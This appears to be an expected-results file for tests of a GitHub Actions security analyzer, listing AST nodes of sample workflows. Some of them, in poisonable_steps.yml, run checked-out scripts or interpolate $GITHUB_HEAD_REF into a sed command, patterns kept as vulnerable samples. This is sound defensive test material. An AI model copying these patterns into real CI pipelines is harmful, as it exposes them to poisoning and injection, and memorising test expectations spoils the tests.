.github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | 
github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | 
on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" 
\| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test 
foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 
| Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:1:5:1:8 | push | 
.github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:1:5:1:8 | push | .github/workflows/shell.yml:1:5:1:8 | push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:14:5:26 | ubuntu-latest | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:16:7:19 | pwsh | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:10:14:10:26 | ubuntu-latest | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | 
.github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:15:14:15:27 | windows-latest | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:16:17:19 | bash | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:20:14:20:27 | windows-latest | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | 
